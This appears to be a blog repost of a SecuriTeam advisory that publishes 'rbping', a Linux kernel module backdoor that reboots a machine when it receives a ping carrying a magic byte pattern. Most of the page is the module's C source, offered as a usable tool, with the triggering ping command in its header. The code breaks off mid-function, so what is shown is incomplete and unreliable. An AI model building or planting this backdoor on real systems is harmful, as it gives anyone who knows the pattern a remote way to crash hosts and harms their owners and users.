The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Rbping - Reboot By Ping
------------------------------------------------------------------------
SUMMARY
DETAILS
rbping is a kernel module that allows an administrator to add a backdoor
that will restart the system whenever it receives a special ping requests.
Tool:
/*
name rbping.c
desc: Reboot By Ping
type: Linux kernel module
author: Edisan <edisan@ghc.ru>
usage: ping -p "deadbaba" ip
tested: linux-2.4.26
GPL rulez
GHC rulez
RST rulez
*/
#define __KERNEL_SYSCALLS__
#define MODULE
#define __KERNEL__
#include <linux/version.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/unistd.h>
#include <sys/syscall.h>
#include <net/icmp.h>
#define LKM_VERSION "v0.1"
#define LKM_NAME "rbping"
#define MAGIC_PATTERN 0xbabaadde
int new_icmp_rcv(struct sk_buff *);
struct inet_protocol * original_icmp_protocol;
struct inet_protocol new_icmp_protocol =
{
&new_icmp_rcv,
NULL,
NULL,
IPPROTO_ICMP,
0,
NULL,
"ICMP"
};
int new_icmp_rcv(struct sk_buff *skb)
{
char *data = skb->data+16;
if (*(u_long *)data == MAGIC_PATTERN)
{
extern void *sys_call_table[];
int (*our_kill)(int, int) = sys_call_table[SYS_kill];
printk("<1>%s: reboot requested.\n", LKM_NAME);
our_kill(1, 2);
}
#ifdef DEBUG
else
printk("<1>%s: icmp pattern rcv: %x\n", LKM_NAME, *(u_long *)data);
No comments:
Post a Comment